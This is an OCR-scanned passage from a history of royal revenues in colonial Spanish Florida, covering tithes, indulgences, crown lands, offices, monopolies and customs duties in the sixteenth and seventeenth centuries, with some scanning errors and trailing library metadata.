crown, which was making up the difference in his income, referred his query to the Florida governor and royal officials, asking them whether their provinces were not suffragan to that bishop. They replied that don Juan de las Cabezas Altamirano had brought credentials as the bishop of Florida and Cuba when he made his visitation in 1605, but he had not asked for tithes, nor had any been sent to Cuba since.7 Orders must have followed to send the bishop his fourth, for several years later the royal officials mentioned that tithes were no longer being administered as a royal revenue.8 In 1634, before this happened, Accountant Nicolas Ponce de Le6n summarized what the tithes had been amounting to. The tithes of maize collected between 1631 and 1633 had come to 2,691 /2 arrobas, or about 897 arrobas a year Of this, 406 1/2had been sold at 5 /2 reales the arroba and the rest at 5 reales, making a three-year total of 1,707 /2 pesos in tithes of maize, which averaged to 569 pesos a year For the tithes from miscellaneous sources the accountant gave yearly figures, which totaled 468 pesos for the same period. Total tithes averaged 725 pesos a year indicating a titheable production of around 29,000 pesos a year between 1631 and 1633, less than in 1600.9 In the 1640s there were great expectations from a wheat farm started by Governor Salazar Vallecilla on the Apalache-Timucua border. There would be other farms and much revenue, he and the royal officials thought, enough to establish an abbacy in St. Au- gustine similar to the one in Jamaica and keep all the tithes at home. Ponderous inquiries were set in motion, without result. Governor Rebolledo, in 1655, joined the campaign. Florida tithes now amounted to 2,000 pesos annually, he said, exaggerating, and if that sum was not adequate to support an abbot, he would gladly dispense with his sergeant major No Cuban bishop had visited Florida in fifty years.10 The crown responded by asking for a report on the tithes of the previous ten years. Tithes of maize from 1648 to 1657 came to an average of 1,068 arrobas a year; which at 1 peso the arroba brought in 1,068 pesos. The increase in value over the average of 569 pesos a year between 1631 and 1633 was mainly due to the higher price per arroba. For the first time livestock (ganado mayor) appeared as a separate category. The average total tithes for the ten-year period came to 1,411 pesos. If tithes were 2/2 percent of both crops and calves- something of which we cannot be sure-this indicated a titheable 78 The Royal Revenues ranching and agricultural production of some 56,000 pesos a year."11 This was evidently insufficient to support an abbot, for that idea was dropped. When don Gabriel Diaz Vara Calderon came on episcopal visit in 1674-75, he arrived in St. Augustine four days after a flood and charitably devoted the tithes laid up for him to relieving the hungry.12 Soon after the bishop's visit, the treasury officials were ordered to begin sending the canons of the cathedral chapter their designated fourth of the tithes and explain why this had been neglected. They Protested that no one had ever asked for them, and that anyhow tithes in Florida were grossly overvalued. When the livestock was auc- tioned, soldiers bid four or five times what it was worth, charging the amount to the back salaries they never expected to see. In this way cattle worth less than 1,000 pesos had been sold for 4,400, giving a false impression of the provinces' resources. In order to correct this overpricing, the treasurer and accountant meant in future to purchase the tithes of livestock as they did the tithes of maize, for rationing the soldiers. They would pay the local clerics, the bishop, and the cathe- dral chapter in drafts against the situado. The three ecclesiastics serving the parish church and the soldiers' chapel were paid around 900 pesos a year.13 If half of the tithes were sent to Cuba, the total revenue must come to 1,800 pesos a year in order to cover clerical salaries, necessitating an annual titheable production of somewhere near 72,000 pesos. This level of production Florida's Spanish population was unable to maintain. In 1697 the crown inquired why the bishop was not receiving his tithes. The royal officials answered briefly that in Florida the tithe was paid in the form of grain and was distributed to the soldiers. The year 1697 had been one of famine, when even the parish priest's private store of maize had had to be requisitioned, to his great indignation. As the bishop himself said, in times of hunger all men quarreled and all had reason.14 The crown's other ecclesiastical revenue in Florida came from the cruzada, or bulls of the crusade, which Haring has called "the queerest of all taxes."15 This was a semicompulsory indulgence whose pro- ceeds had been granted by the popes to the Spanish crown in recogni- tion of its crusading activities. Royal officials and other dignitaries in the Indies paid two pesos a year; regular Spanish subjects one peso, and Indians and blacks two reales.16 The cruzada must have been 79 The King's Coffer permitted to go for local purposes in Florida, for the indulgences were independently requested by the royal officials, a priest, and perhaps a governor. Governor Marques Cabrera once received 5,000 of them, neatly divided between bulls for the living and for the dead.17 A cleric known as the minister or subdelegate of the Tribunal of the Holy Crusade did the preaching, and another cleric served as the notary. 18 By the end of the seventeenth century the market was glutted. The royal officials asked that no more indulgences be sent to Florida, where the people were poor and the last two shipments were sitting unsold in the warehouse. Ignoring pressure from the parish priest and the Council of the Indies, they refused to publicize the bulls any further 19 The second category of treasury income was provided by crown properties. Aside from the presidio's ships, which are treated later in this chapter; crown properties producing income consisted of lands, productive enterprises, slaves and convicts, royal offices, and monopolies. Wherever Spaniards settled in the Indies they first recognized the lands belonging to pacified Indian towns, then founded their own municipalities, each of which was provided with several square leagues for the use of its vecinos. Other grants of land were personal. Pedro Menendez, as part of his contract with the king, was entitled to claim an immense area 25 leagues on a side-more than 5,500 square miles, by Lyon's calculation.20 He was also privileged to give out large tracts (caballerias) to gentlemen and smaller ones (peonias) to foot soldiers. Although many of these grants were in Santa Elena, when the two presidios were combined the settlers from Santa Elena were given lands in and near St. Augustine as though they had been J there from the start.21 All of the remaining, unused lands (tierras baldias) in the ecumene became part of the royal demesne (realengo). Anyone wishing to use a portion of it for some productive purpose, such as a cattle ranch estanciaa de ganado or hato), applied to the governor. If the center or the headquarters of the proposed ranch was no nearer than 3 leagues from any native village and did not encroach upon another holding, the petitioner might be issued a provisional title.22 Possession was conditional: land lying vacant reverted to the crown. For over a century whatever taxes were paid on these lands held in usufruct went unreported. Treasury officials later claimed that the 80 The Royal Revenues governors had collected fifty Castilian pesos per ranch. In the 1670s Governor Hita Salazar instituted a regular quitrent along with an accelerated land grants program to raise money for the castillo. Hacienda owners were charged four reales per yugada, which was the area a yoke of oxen could plow in one day, with a minimum of five Spesos.23 The governor also offered to legitimize earlier land titles and make them permanent. A clear title to a ranch cost fifty pesos per legua cuadrada, though it is not certain whether this was a square league, a league on the side ofa square, or a radial distance in a circular grant.24 The chiefs of native towns followed suit, selling their extra fields or leasing them to Spaniards.25 As it was a royal prerogative to grant lands in perpetuity, the government in Madrid annulled all titles issued by chiefs or gover- nors, at the same time inviting more regular applications. Between S1677 and 1685 land sales and title clearances (confirmaciones) in Florida brought in 2,500 pesos to be applied to castillo construction.26 The crown also disallowed part of the governor's new taxation schedule. Lands granted at the foundation and still held by the heirs were not to be taxed, ever. Land distributed after then could be taxed, but at no more than Hita Salazar's 4 reales the yugada, later reduced to 1 real.27 Disposition of the revenues from lands beyond the confines of St. Augustine was a royal prerogative as much as granting the lands was. For several years the income was assigned exclusively to castillo construction, but starting in 1688 a modest sum was allowed for the expenses of holy days.28 In some parts of the Indies another kind of title clearance was going on: foreigners could legitimize their presence by a payment (composicion). Several times the crown asked the officials in St. Au- gustine for a list of resident foreigners, including Portuguese, but as there is no evidence that the aliens paid anything extra into the treasury, this was probably for reasons of military and anti- schismatic security.29 The crown made one brief foray into agricultural production in Florida. In 1650 Governor Salazar Vallecilla's experimental wheat farm had been in operation for five years. Six square leagues were under cultivation; buildings, granaries, and corral were complete; and the property inventory included two experienced slaves, eight horses and mules, eleven yokes of draft oxen, and the necessary plows and harrows. The governor had even sent to the Canaries for 81 The King's Coffer millstones and a miller Accountant Nicolas Ponce de Le6n thought that in New Spain such an hacienda would be worth over 20,000 pesos. Unfortunately Governor Salazar Vallecilla died in the epidemic of 1649-50. When his son Luis, anxious to leave Florida, tried to sell the wheat farm, either no one wanted it or no one could afford it. Ponce de Le6n, as interim governor; bought the hacienda for the crown at a cost of 4,259 pesos in libranzas that he estimated to be worth one-third less. He predicted that the farm would pay for itself within three years. The fiscal of the Council of the Indies, reading of the purchase, noted that even if the hacienda took longer than that to show a profit it would be valuable if it encouraged the production of flour in Florida. The Council sent word for the royal officials to administer this royal property without intervention from governors, making yearly reports on its progress.30 Before word got back of the crown's approval, the hacienda had vanished. Ponce de Le6n had survived his friend Salazar Vallecilla only a short time. Locally elected Interim Governor Pedro Benedit Horruytiner had been persuaded by the Franciscans that Spanish settlement in the provinces had provoked the Apalache rebellion of 1647. At their request he had dismantled the wheat farm and sold off its inventory without waiting for the due process of auction. Wheat continued to be grown in Apalache and Timucua, as well as rye and barley, but not for the presidio. Most of the grain was shipped out by the chiefs and friars to Havana.31 In 1580 the crown gave permission for the treasury officials to obtain thirty able-bodied male slaves left over from the building of a stone fort. From time to time these were replenished.32 When there was disagreement among the officials as to which of them was to manage the slaves, they were informed that the governor should do it, while they kept track of expenses. Their complaints that the governor used the slaves for personal purposes were ignored. When the slaves were not needed on the fortifications they were hired out and their earnings paid for their rations.33 The same policy applied to the convicts sentenced to Florida: their labor bought their food. One illiterate black convict who had become a skilled blacksmith during his term in St. Augustine elected to stay on as a respected member of the community.34 Native malefactors were sent to some other pre- sidio unless there was a labor shortage in Florida. Whether in Havana or St. Augustine, their sentence lengths were often forgotten and 82 The Royal Revenues their prison service then became indistinguishable from slavery.35 Slaves and convicts not only saved the crown money but were themselves a source of income. The timber they logged and sawed, the stones they quarried and rafted across the harbor from Anastasia Island, the lime they burned from oyster shells, the nails and the hardware they fashioned-not all was used in the construction of the castillo and government houses. Some was sold to private persons and converted into a revenue of the crown.36 Royal offices were a form of property expected to produce in- come every time they changed hands. Treasury offices became venal for the Indies in the 1630s; other offices already being sold were ecclesiastical benefices and military patents, which at least once included the Florida captaincy general.37 In many of its overseas realms the crown sold municipal offices as well, but not in Florida. When a royal cedula dated 1629 arrived asking for a list of the offices it might be possible to fill in that land, Accountant Juan de Cueva responded that there were no new settlements; the only town of Spaniards was the one at the presidio.38 One office frequently sold or farmed out in the Indies was that of tribute collector (corregidor de indios). For reasons that will be seen, this office did not exist in Florida. The St. Augustine treasury received revenue from the auc- tion of lesser posts such as public and governmental notary or toll collector on the Salamototo ferry, but this income was inconsequen- tial and almost certainly never reached the crown.39 The half-annate (media anata) was a separate revenue derived from offices and other royal grants: the return to the crown of half the salary of one's first year of income. Except in the case of ecclesiastics, it superseded the earlier mesada, or month's pay paid by a new ap- pointee. Presented as an emergency measure following Piet Heyn's seizure of the treasure fleet, the half-annate was decreed in 1631, empire-wide, for every beneficiary of the king's grace, from a minor receiving a plain soldier's plaza, to the royal infants, the king's sons. According to the Recopilacidn, the half-annate was increased by half (making it actually a two-thirds-annate) from 1642 through 1649.40 But Governor Luis de Horruytiner coming to Florida in 1633, paid the two-thirds amount, not the half. It was permitted to pay the tax in two installments, signing a note at 8 percent interest for the second half, due one year later This is what Horruytiner did.41 For the rather complicated bookkeeping of this tax the St. Au- 83 The King's Coffer gustine treasury was authorized to hire a clerk of the half-annate, but collection of the royal kickback did not proceed evenly. The auditor who came to Florida in 1655 found that three-fourths of those liable for the half-annate still owed on it.42 In 1680 it was decreed that the governors of Florida were exempt from the tax because His Majesty had declared their post to be one like Chile, known for active war (guerra viva). Four years later the treasury officials were included under this exemption because of valor shown during a pirate attack. What half-annate those in office had already paid was refunded.43 The tax was not reinstated for this category of officials until 1727. Regular officers, however; in spite of a 1664 law exempting those on hazard duty, continued to owe the half-annate on their original appointments and for every promotion.44 One more revenue from royal offices was the unpaid salary money vacanciess) due to the death or suspension of royal appointees. As we have seen, the vacancies of bishoprics in New Spain formed a regular fund upon which the crown drew for extraordinary ex- penses. The same held true for Florida, except that the money was absorbed locally the way vacant plazas were. Surplus salaries due to vacancies were sent to the crown one time only, in 1602.45 A final type of revenue-producing royal property was the monopoly. The king had a tendency to alienate his monopolies by giving them out as royal favors (mercedes). Pedro Menendez's con- tract, for example, promised the adelantado two fisheries in Florida, of fish and of pearls. Since the pearl fishery did not materialize, this clause meant, in effect, that only the governor or his lieutenants had the right to fish with a drag net or a seine, and this privilege was enforced. When the dispute over the Menendez contract came to a formal end in 1634, the family's one remaining property in Florida was this fishery.46 Another monopoly which produced no revenue for the crown was gambling. To the official circular extending the monopoly of playing cards in the Indies, Governor Ybarra responded that people in Florida did not use them.47 Some years later Sergeant Major Eugenio de Espinosa was granted the right to run a gaming table in the guardhouse, a monopoly he passed on to his feckless son-in- law. 48 Beginning in 1640, paper stamped with the royal coat-of-arms (papel sellado) was required for legal documents in the Indies. A 84 The Royal Revenues governor's interim appointment, for instance, must be written up on twenty-four-real paper for the first page and one-real for each page thereafter. Ordinary notarized documents began on six-real paper. Indians and indigents were entitled to use paper costing a quarter- real, or omit the stamp altogether. Perhaps this was why St. Au- gustine notaries seldom bothered to keep a supply of stamped paper; although when they used the unstamped they were supposed to collect an equivalent fee.49 One further crown revenue from a monopoly came from the three reales per beef charged at the royal slaughterhouse. Governor Marques Cabrera instituted this fee in the 1680s to pay for construc- tion of the slaughterhouse and raise money for the castillo. It was one of his little perquisites to be given the beef tongues.50 The third category of royal revenues in Florida came from ship- ping. In St. Augustine, founded as the result of a naval action, ships were highly important. The townspeople were descendants of sea- farers, and their only contact with the outside world was by sea. The bar at the entrance to their harbor was shallow at low tide, especially after the great hurricane of 1599, which altered many coastal features. Use of the harbor was consequently restricted to vessels under 100 tons or flat-bottomed flyboats on the Flemish model.51 Some of the galliots, frigates, barges, pirogues, launches, shallops, and tenders belonging at various times to the presidio were purchased in Spain, Vera Cruz, or Havana, but a surprising number were constructed locally, perhaps in the same San Sebastian inlet where present-day inhabitants build shrimp boats. The people of St. Augustine referred to their boats fondly by name (Josepfe, Nuevo San Agustin) or nickname (la Titiritera, la Chata). Storms, shallows, and corsairs guaranteed that no vessel would last forever; but woe to the master who by carelessness or cowardice lost one! One source of the crown income from shipping was freight (fletes). Freight charges in the Caribbean were high. Gillaspie esti- mates that between 1685 and 1689 shipping costs on flour repre- sented 35 percent of its cost to the presidio. Whenever possible, the royal officials and the governor would buy a boat to transport the supplies rather than hire one. And since it cost 300 ducats a year to maintain the presidio boats whether they were in use or not, and the seamen had to be paid and rationed in any case, the vessels were kept in service as much as possible.52 In them the chief pilot and other 85 The King's Coffer shipmasters carried loads of supplies out to the missions and maize back to the town. They patrolled the coast, putting out extra boats after a storm to look for shipwrecks, survivors, and salvage. They also made trips to Havana, Vera Cruz, Campeche, and across the Atlantic. On any of these trips the shipmasters might execute private commissions and carry registered goods for those willing to pay the freight. Governor Mendez de Canzo's first report to the crown from St. Augustine suggested that the mariners be paid from these ship revenues. The crown responded by requesting the governor to report on all the presidio vessel income, what it was converted to, and on what spent. Accountant Bartolome de Argiielles replied on his own. The governor, he said, saved himself 1,000 ducats a year in freight by the use of His Majesty's flyboat.53 A second crown revenue from shipping was the import and export duty on trade: the almorifazgo, which later officials would write "almojarifazgo." It was a complicated tax whose rate could be varied in numerous ways: by the class of goods, by their origin, by whether or not they were being transshipped, by the port of exit or entry (colonial or Indies), by special concessions to the seller carrier or consignee, and, perhaps most, by the individual interpretations of corrupt or confused officials. The year after St. Augustine was founded the duties on Spanish imports were doubled from 2 V2 to 5 percent ad valorem on articles leaving port in Spain, and from 5 to 10 percent on the same articles at their increased value in the Indies. The tax on wine more than doubled, changing from a total of 7/2 percent to 20. Products of the Indies leaving for Spain paid 22 percent at the port of origin and 5 percent upon arrival.54 At the time, all this was theoretical as far as Florida was concerned. The adelantado and his lieutenants had been exempted from the almorifazgo for the three years of his contract, and the first settlers for ten years.55 The export tax apparently began in 1580, the year the Florida provinces were given permission to send two ships a year to the Canaries or Seville. At the same time the crown granted up to 300 ducats from the situado to build a customs house on the wharf in St. Augustine-a suggestion that became a command three years later.56 The governor and royal officials used the proceeds of the export almorifazgo to pay their own salaries until 1598, when the crown assigned that income for the next four years to the parish church. The 86 The Royal Revenues rate at which the tax was then being collected is unknown. In 1600 the auditor set it at 21/2 percent. Export almorifazgo revenue came mostly from the sassafras and peltry of the Georgia coast. Realizing that St. Augustine was not a convenient shipping point, the royal officials sent a representative to San Pedro (Cumberland Island) to record cargoes, collect the tax, and see that the Indians were not cheated.57 Several general exemptions from the almorifazgos operated to the benefit of people in Florida. The belongings of royal appointees going to the Indies were exempt up to an amount stated in their travel licenses. Everything for divine worship and educational purposes was shipped tax-free, including the supplies and provisions for friars, and any kind of book. Colonially produced wheat flour and similar staples paid no tax in the port of origin. In 1593 a specific exemption was provided for the Florida presidio: nothing consigned to it from Vera Cruz was to be charged customs.58 A reduction in expense was not a revenue. The royal officials at the treasury in St. Augustine were supposed to be charging import almorifazgos of their own: 10 percent ad valorem on cargoes direct from Spain, 5 percent on the increase in value of Spanish goods transshipped from another colonial port, and 5 percent ad valorem on any colonial goods, even from another port in Florida. During the sixteenth century this almorifazgo was haphazardly applied. Ac- countant Argiielles reported that Governor Mendez de Canzo did not pay taxes on half of what the presidio boats brought him, yet it is evident that the royal officials did not know what percentage to charge.59 Auditor Pedro Redondo Villegas, coming to Florida in 1600, ordered that almorifazgos be collected on all imports regardless of point of origin, seller; carrier consignee, or kind of goods. In his view, supplies bought with situado funds were as liable to entry duties as the goods purchased by individuals. The treasury officials in St. Augustine, as purchasing agents for the garrison, were accustomed to buy naval supplies tax-free from the skippers of passing ships. Their defense was that if the treasury charged the skipper an almorifazgo, he added the amount of it to his price and the cost was passed on to the soldiers, which they could ill afford. But when the auditor insisted that even naval supplies were subject to import duties, the treasury officials acceded without further protest; the revenue was to be 87 The King's Coffer applied to their salaries.60 At San Juan de Ulia, the port for Vera Cruz, the officials imposed an import almorifazgo of 10 percent on Spanish goods, based on the appraised value of the goods in their port. The Florida officials assumed that their own import tax on the same goods should be 10 percent of the increase in value between the appraisal at San Juan de Ulua and the appraisal they made in St. Augustine. Redondo Villegas, rummaging about in Juan de Cevadilla's old papers, found what was probably the tax schedule of 1572-74 saying that the proper percentage was 5 if the goods had paid 10 percent already.61 Presumably this was the rate the royal officials adopted for Spanish merchandise that did not come directly from Spain. They collected it in a share of the goods, which they ex- changed preferably for cash at auction. Auditor Redondo Villegas had gone too far In 1604 the crown repeated the presidio's 1593 exemption with clarifications for his benefit: Because they are needy and prices are high and their salaries are small I order that they not pay taxes of almorifazgo in those provinces even when it is a contract with some private person, and this goes for what may be loaded in Seville also, or in another part of these kingdoms, on the situado account.62 In other words, goods charged against the situado were not to have export duties levied on them at the point of origin, or import duties in Florida. The royal exchequer was not so distinct from the presidio that the one should tax the other The strong position taken in this cedula lasted for two years. In 1606 the crown ordered that the export tax be paid on all wine shipped to the Indies, even that going as rations for soldiers. The royal officials in St. Augustine, for their part, levied the import almorifazgo on all merchandise brought in by private persons to sell to the soldiers, over the protests of the company captains, the gov- ernor and at times, the crown.63 The first customs house was evidently destroyed in the fires or flood of 1599. To replace it, the officials asked for and received an addition to the counting house. They also were allowed a customs constable on salary and a complement of guards when there were goods on hand for registration or valuation.64 The people of St. 88 The Royal Revenues Augustine put their ingenuity to work getting around the hated tax. By law, no one was supposed to board or disembark from an incom- ing ship ahead of the official inspection, under pain of three months in prison. Interim Accountant Sinchez Siez, syndic and close friend of the Franciscans, may have been the one who suggested that the friars board vessels ahead of the royal officials. In the name of the Holy Office of the Inquisition they could seal boxes of books containing schismatic material, and only they could reopen these sealed boxes. Books were nontaxable items, and the friars, secure against inspec- tion, could introduce high-value goods in the guise of books, un- taxed. This was a common practice in the Indies. Governor Ybarra put a quick stop to the friars' presumption.65 Due to a shortage of ships, the crown was often forced to allow trade to foreign vessels. The earliest reinforcements ever to arrive in the new Florida colony, in the Archiniega expedition of 1566, shipped out in Flemish ships whose owners refused to embark from San Luicar without licenses to load return cargoes of sugar and hides in Cuba and Santo Domingo.66 The Flemish operated legally; other visitors did not. A foreign-owned ship coming to trade without registration was subject to seizure and confiscation, yet most of the merchant ships visiting St. Augustine may have been foreign. In 1627 the treasury officials accused Governor Rojas y Borja of being in collusion with Portuguese merchant Martin Freile de Andrada and of allowing open trade with the French.67 By 1683 the crown, totally unable to supply its colony on the North Atlantic seaboard, was forced to approve Governor Marques Cabrera's emergency pur- chases from a New York merchant he called Felipe Federico. This Dutchman first gained entrance to the harbor as an intermediary returning the governor's son and another lad captured by pirates. Captain Federico and his little sloop, The Mayflower, became regular callers at St. Augustine. Others followed suit.68 The penalty for bringing in contraband goods even in Spanish bottoms was confiscation. The law provided that after taxes a sixth of the value went to the magistrate, a third of the remainder to the informer; and the rest to the king's coffer.69 In many parts of the Indies this inconvenience was circumvented by the sloop trade in out-of-the-way harbors. In Florida, which had operated outside the mercantile law from the start, such evasions were necessary only when someone important was out of sorts. While Governor Salazar 89 The King's Coffer Vallecilla was under suspension, a ship he had sent to Spain came back with a largely unregistered cargo of dry goods and wine. His confed- erates hid what they could before the return of Treasurer and Interim Co-Governor Francisco Menendez Marquez, who was out in the provinces pacifying Indians, but the treasurer was able to locate 30,000 pesos' worth and apply price evaluations retroactively to what had been sold. For doing this, he declared, his honor and his very life were in danger. The governor and his henchmen were all Basques, Francisco said meaningfully, and the accountant behaved like one.70 Francisco was probably disgruntled at having been left out of the distribution. He was not ordinarily so solicitous of the king's coffer. He and the same accountant, Ponce de Le6n, had been jointly over- drawn 960 ducats from the almorifazgo account between 1631 and 1640, and during most of that time Ponce de Le6n was not in Florida.71 The legal trade with Spain suffered as much from overregulation as from taxes. A cedula of 1621 had licensed the presidio's two little ships-of-permission to export pelts up to a value of 3,000 ducats a year-1,000 ducats above the former limit. By 1673 the Floridians did not find this small a cargo worth their while, yet the crown refused to raise the limit further 72 The royal bureaucracy, rigid about rules, was capricious in en- forcement. In 1688 Accountant Thomas Menendez Marquez, Fran- cisco's son, reported that Captain Juan de Ayala y Escobar was bringing in unregistered goods and evading duties and that the governor, Quiroga y Losada, refused to take action. Unwittingly, Thomas brought down on himself the royal displeasure. If he and the other officials ever let this happen again, the crown warned, they would be punished severely. When they had knowledge of fraud they were to act independently of viceroys, presidents, and governors; how to do so was left unexplained. The governor escaped without reproof, and Ayala y Escobar was commended for his willingness to make dangerous voyages on behalf of the presidio.73 The royal officials complained that they could not be present at all the ports in Florida. Governor Vega Castro y Pardo allowed them to station subordinate customs officials at the San Marcos harbor in Apalache, but these did not stay. The governors' deputies in Apalache were directed to collect duties from visiting ships; in 1657 the friars of that province claimed that this directive had not produced a single 90 Full Text xml version 1.0 encoding UTF-8 REPORT xmlns http: xmlns:xsi http: xsi:schemaLocation http: INGEST IEID ET1YT2SKZ_0488GK INGEST_TIME 2013-07-12T22:23:16Z PACKAGE AA00014878_00001 AGREEMENT_INFO ACCOUNT UF PROJECT UFDC FILES
http://ufdc.ufl.edu/AA00014878/00001
CC-MAIN-2014-42
refinedweb
38,474
57.3
Java Static Constructor is not allowed, but why? Before we dig into the reasons for not allowing static constructor, let’s see what happens if we want to make a constructor static. Table of Contents Java Static Constructor Let’s say we have a class defined as: Copypublic class Data { private int id; public static Data() {} } If you will try to compile this class, you will get an error message as Illegal modifier for the constructor in type Data; only public, protected & private are permitted. Why Static Constructor is not allowed? Let’s see some of the reasons that make the compelling arguments for not allowing static constructor in java. Static Belongs to Class, Constructor to Object We know that static methods, block or variables belong to the class. Whereas a Constructor belongs to the object and called when we use the new operator to create an instance. Since a constructor is not class property, it makes sense that it’s not allowed to be static. Static Block/Method can’t access non-static variables We know that static methods can’t access non-static variables. Same is true for static block also. Now, the main purpose of a constructor is to initialize the object variables. So if we make constructor as static then it won’t be able to initialize the object variables. That will defeat the whole purpose of having a constructor for creating the object. So it is justified to have the constructor as non-static. Notice that we can’t use this inside a static method to refer to the object variable. Below code will give compilation error as: Cannot use this in a static context. Copypublic static void main(String args[]) { System.out.println(this.id); } Static Constructor will break inheritance In Java, every class implicitly extends Object class. We can define a class hierarchy where subclass constructor calls the superclass constructor. This is done by super() method call. Most of the times JVM automatically calls the superclass constructor but sometimes we have to manually call them if there are multiple constructors in the superclass. Let’s see an example for super() usage. Copypackage com.journaldev.util; class Data { Data() { System.out.println("Data Constructor"); } } public class DataChild extends Data{ public DataChild() { super(); //JRE calls it explicitly, calling here for explanation System.out.println("DataChild Constructor"); } public static void main(String args[]) { DataChild dc = new DataChild(); } } Above program will produce the following output. CopyData Constructor DataChild Constructor If you look at the super() method, it’s not static. So if the constructor becomes static, we won’t be able to use it and that will break inheritance in java. Java Static Constructor Alternative If you want to initialize some static variables in the class, you can use static block. Note that we can’t pass arguments to the static block, so if you want to initialize static variables then you can do that in the normal constructor too. Copyclass Data { public static int count; static { count = 0; } Data(int c) { //not recommended since the count is class variable //and shared among all the objects of the class count=c; } } Summary Java static constructor is not allowed and we have very good reasons for that. We can initialize static variables using the static block as well as through constructor.
https://www.journaldev.com/22432/java-static-constructor
CC-MAIN-2019-13
refinedweb
553
54.42
Any one having idea what is the market price ofVitz 2010 (1.0 pearl black)55000 kmAutomaticIslamabad registered1 door painted 10.80 k if its really clean and engine is ok . import & registration kab ki hay?? Sorry brother maybe in Lahore but not in Islamabad...10.80 mei tu 1.0 Passo bhi nai ati...May be Boon ..... I just bought one a week back and 10.80 mei vitz ka older version hi milay ga Do not know about the price drop with the painted door however after searching in g-8,9,10,11.....F-10,11 unregistered 2010 1.0 vitz was well around 12.50 and plus..
https://www.pakwheels.com/forums/t/vitz-2010-price/210683
CC-MAIN-2018-05
refinedweb
111
81.09
! Last edited by mrtxu; September 22nd, 2003 at 10:59 AM. With Range("G1") .Orientation = 45 End With Thanks Gizmo001! But what I need is to change the axis lable text orientation on the chart to 45 degree, not the text orientation in excel. Any idea about that? Try this (for x-axis) with appropriate changes to the first line (depending on your Excel chart name): ActiveSheet.ChartObjects("Chart 1").Activate ActiveChart.Axes(xlCategory).AxisTitle .HorizontalAlignment = xlCenter .VerticalAlignment = xlCenter .ReadingOrder = xlContext .Orientation = 45 End With and for y-axis ActiveSheet.ChartObjects("Chart 1").Activate ActiveChart.Axes(xlValue).AxisTitle .HorizontalAlignment = xlCenter .VerticalAlignment = xlCenter .ReadingOrder = xlContext .Orientation = 45 End With Where is With Statement? or With what? chart? sheet? or range? Thanks! Sorry, with statement should begin with the Activechart line. For example if your active chart is named xlchart With xlchart.Axes(xlvalue).axistitle .orientation =45 end with By the way, go to Excel, turn macro tool on, and record the macro as you rotate the axis label on the chart. After rotation is complete, stop recording macro. Then edit macro to see the visual basic code created. You can bring this code into VB.Net with minor variations with respect to the object names: Excel sheet name, chart name, etc. For any Excel command/function that you want to implement in VB, this is a good way to find the syntax. Good luck. Sorry to bother again Gizmo001! My VB.Net won't recognize Axes(xlCategory) saying xlCategory not defined. And also ActiveChart, ActiveSheet, etc. I am thinking maybe I need to import some special classes. But I can get regular chart on the sheet already. I am so confused. Since the X axis label is now showing horizontally its not showing all on the chart when taking larger numbers of rows from excel. That's the reason I want to change its orientation to 45 degree or 90 degree. Although I can manually change that in excel I still think there should be a way in VB.Net coding. Sorry, I tried to check it out, and it didn't work either. It used to work with earlier verisions of Excel reference library (8.0 Object library), but with 10.0, it does not work. I have not been able to figure out the equivalent syntax for the new Excel library. You need to reference the Microsoft.Office.Core namespace, ie. .ReadingOrder = Microsoft.Office.Core.XlReadingOrder.xlContext Forum Rules
http://forums.codeguru.com/showthread.php?264545-How-to-change-an-excel-chart-axis-alignmen-in-VB.Net&p=817127
CC-MAIN-2016-26
refinedweb
410
59.9
Hi, Akio! I bet there is no Caché Evaluation version on Mac, only Windows. So if you want to run it on Mac - the virtual machine is your friend. But I would suggest starting with new product InterSystems IRIS - you can get your sandbox here or on GCP. Hi, Akio! There is a link to Download Caché just in the INTERSYSTEMS RESOURCES panel on the right side of every page on Developer Community. I do suggest also to try not only Caché but our new InterSystems IRIS Data Platform: IRIS Sandbox, IRIS on Google Cloud. Hope that helps. Hi Sean! Moved the discussion to the Other group. 4,800+ are the registered members, stats. We also have about 20,000 unique DC visitors monthly. From them we have about 3,000 visitors who come directly to the site - so we can assume as "real" developers who reads/writes on DC daily. But this touches only the English world. And not all of them know about DC. Hi, Scott! It's obvious, but what about this? ^OSUWMCInstance = "TestClin" ^OSUMCLDAP("LDAPKey") = "/ensemble/"_^OSUWMCInstance_"/mgr/LDAPKeyStore/" If you don’t use Studio, you can consider to try isc-dev tool, which is intended to simplify routine processes of import/export code, releases and patches. Import it to e.g. USER and map to %All. After that you’ll be able to import, export, release and patch in any namespace. To work in a given namespace point the tool to a directory on the disk which contains repository in UDL or XML classes (preferablly UDL) with the following command: Hi, Stephen! Thanks for raising it! This button with a strange glyph is for uploading images only to be placed in a post. I forgot, that we left the option to upload files - we plan to turn it off. Would you please share why do you need the option of file uploading for the posts? IF there is a good reason we can enhance the feature instead of dropping it. How to call a classmethod? If you are inside the class Circle call it with: do ..Radius() If you call this method from another class use: do ##class(Circle).Radius() But there are cases when you do not know either name of a class or name of a method on runtime. So $classmethod is your friend here: do $classmethod("Circle","Radius") HTH
https://community.intersystems.com/user/11016/answers?filter=accepted&page=1
CC-MAIN-2019-43
refinedweb
398
74.69
(Pseudo)random normal(0,1) floating-point number generator. More... #include <Tsqr_Random_NormalGenerator.hpp> (Pseudo)random normal(0,1) floating-point number generator. Implemented using LAPACK's _LARNV routines. Definition at line 61 of file Tsqr_Random_NormalGenerator.hpp. Constructor with custom seed. Definition at line 82 of file Tsqr_Random_NormalGenerator.hpp. Constructor with default seed. The four-integer seed is set to [0, 0, 0, 1], which is a valid seed and which ensures a reproducible sequence. Definition at line 103 of file Tsqr_Random_NormalGenerator.hpp. Get the next pseudorandom number. If the buffer length is > 0, the buffer is first filled with newly generated values if it's empty, and then the value is fetched from the buffer. Depending on the buffer length, filling it may take a while, which means that calling this function may on occasion take longer than you expect. If you don't like this behavior, use a buffer length of 1. Definition at line 124 of file Tsqr_Random_NormalGenerator.hpp. Get the current seed. The seed consists of four integers, according to the requirements of LAPACK's _LARNV routines. This can be used to restart the generator, but only if you account for the buffered values. Definition at line 136 of file Tsqr_Random_NormalGenerator.hpp.
http://trilinos.sandia.gov/packages/docs/r10.10/packages/kokkos/doc/html/classTSQR_1_1Random_1_1NormalGenerator.html
CC-MAIN-2013-48
refinedweb
205
52.56
